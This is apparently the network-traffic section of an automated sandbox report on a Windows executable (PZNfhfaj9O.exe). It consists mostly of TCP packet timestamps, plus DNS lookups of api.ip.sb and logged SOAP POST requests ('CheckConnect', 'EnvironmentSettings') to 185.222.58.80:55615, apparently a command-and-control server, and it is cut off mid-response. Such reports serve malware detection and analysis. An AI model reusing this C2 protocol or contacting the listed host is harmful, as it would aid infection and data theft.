                                                                              Oct 13, 2024 21:02:39.189060926 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.189089060 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.189104080 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.189122915 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.189138889 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.189155102 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.189171076 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.189188957 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.189204931 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.189321041 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.189337015 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.189352989 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.189469099 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.189486027 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.189502001 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.189824104 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.189841032 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.189857006 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.189873934 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.189889908 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.189907074 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.189923048 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.189939022 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.189955950 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.189971924 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.189986944 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190005064 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190021038 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190037966 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190053940 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190069914 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190085888 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190103054 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190119028 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190135002 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190150976 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190166950 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190182924 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190198898 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190217972 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190244913 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190262079 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190278053 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190299034 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190315008 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190330982 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190359116 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190375090 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190392017 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190407991 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190424919 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190440893 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190457106 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190473080 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190490007 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190505981 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190521955 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190607071 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190623999 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190640926 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190656900 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190671921 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190690041 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190706015 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190732956 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190749884 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190767050 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190785885 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190802097 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190818071 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190834045 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190850973 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190866947 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190882921 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190911055 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190927982 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190944910 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190960884 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190979004 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.190994024 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.191010952 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.191030979 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.191047907 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.191063881 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.191091061 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.191106081 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.191123962 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.191140890 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.191159964 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.191175938 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.191191912 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.191209078 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.191277027 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.191293001 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.191310883 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.191328049 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.191344023 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.191363096 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.191379070 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.191406012 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.191422939 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.191438913 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.191457033 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.191545010 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.191561937 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.191579103 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.191595078 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.191612005 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.191627979 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.191643953 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.191663027 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.191679001 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.191694975 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.192374945 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.192395926 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.192424059 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.192440033 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.192455053 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.192473888 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.192574024 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.192591906 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.192671061 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.192687988 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.192706108 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.192723036 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.192742109 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.192758083 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.192774057 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.192871094 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193013906 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193052053 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193068981 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193087101 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193105936 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193121910 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193139076 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193265915 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193281889 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193300962 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193317890 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193335056 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193351984 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193367958 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193387032 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193403959 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193420887 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193437099 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193454027 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193470001 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193485975 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193502903 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193530083 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193547010 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193562984 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193651915 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193669081 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193686008 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193701982 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193718910 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193734884 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193766117 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193783045 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193799019 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193814993 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193831921 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193851948 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193876028 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193892956 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193908930 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193923950 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193942070 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193969011 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.193984985 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194003105 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194019079 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194037914 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194053888 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194071054 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194153070 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194169998 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194185972 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194202900 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194219112 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194236040 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194252968 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194281101 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194298029 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194315910 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194333076 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194349051 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194365978 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194385052 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194401979 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194417953 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194434881 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194452047 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194468975 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194497108 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194514036 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194530964 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194547892 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194564104 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194580078 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194596052 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194645882 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194662094 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194680929 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194698095 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194715023 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194731951 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194783926 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194801092 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194819927 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194835901 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194853067 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194869995 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194983959 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.195002079 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.195019007 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.195035934 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.195053101 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.195082903 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.195101023 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.195121050 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.195137024 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.195153952 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.236598015 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:40.140948057 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:40.153492928 CEST4974855615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:40.153848886 CEST4974955615192.168.2.4185.222.58.80

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Oct 13, 2024 21:02:23.790776014 CEST5090953192.168.2.41.1.1.1
                                                                              Oct 13, 2024 21:02:34.132148981 CEST6441853192.168.2.41.1.1.1

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Oct 13, 2024 21:02:23.790776014 CEST192.168.2.41.1.1.10x83d5Standard query (0)api.ip.sbA (IP address)IN (0x0001)false
                                                                              Oct 13, 2024 21:02:34.132148981 CEST192.168.2.41.1.1.10x4392Standard query (0)api.ip.sbA (IP address)IN (0x0001)false

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Oct 13, 2024 21:02:24.125950098 CEST1.1.1.1192.168.2.40x83d5No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 13, 2024 21:02:34.139960051 CEST1.1.1.1192.168.2.40x4392No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false

                                                                              HTTP Request Dependency Graph

                                                                              • 185.222.58.80:55615

                                                                              HTTP Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.449737185.222.58.80556157204C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 13, 2024 21:02:17.340723991 CEST240OUTPOST / HTTP/1.1
                                                                              Content-Type: text/xml; charset=utf-8
                                                                              SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                              Host: 185.222.58.80:55615
                                                                              Content-Length: 137
                                                                              Expect: 100-continue
                                                                              Accept-Encoding: gzip, deflate
                                                                              Connection: Keep-Alive
                                                                              Oct 13, 2024 21:02:18.026077032 CEST25INHTTP/1.1 100 Continue
                                                                              Oct 13, 2024 21:02:18.195992947 CEST359INHTTP/1.1 200 OK
                                                                              Content-Length: 212
                                                                              Content-Type: text/xml; charset=utf-8
                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                              Date: Sun, 13 Oct 2024 19:02:18 GMT
                                                                              Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                              Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                                              Oct 13, 2024 21:02:18.471203089 CEST359INHTTP/1.1 200 OK
                                                                              Content-Length: 212
                                                                              Content-Type: text/xml; charset=utf-8
                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                              Date: Sun, 13 Oct 2024 19:02:18 GMT
                                                                              Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                              Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                                              Oct 13, 2024 21:02:23.295427084 CEST223OUTPOST / HTTP/1.1
                                                                              Content-Type: text/xml; charset=utf-8
                                                                              SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                              Host: 185.222.58.80:55615
                                                                              Content-Length: 144
                                                                              Expect: 100-continue
                                                                              Accept-Encoding: gzip, deflate
                                                                              Oct 13, 2024 21:02:23.470098972 CEST25INHTTP/1.1 100 Continue
                                                                              Oct 13, 2024 21:02:23.674642086 CEST1236INHTTP/1.1 200 OK
                                                                              Content-Length: 9183
                                                                              Content-Type: text/xml; charset=utf-8
                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                              Date: Sun, 13 Oct 2024 19:02:23 GMT
                                                                              Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
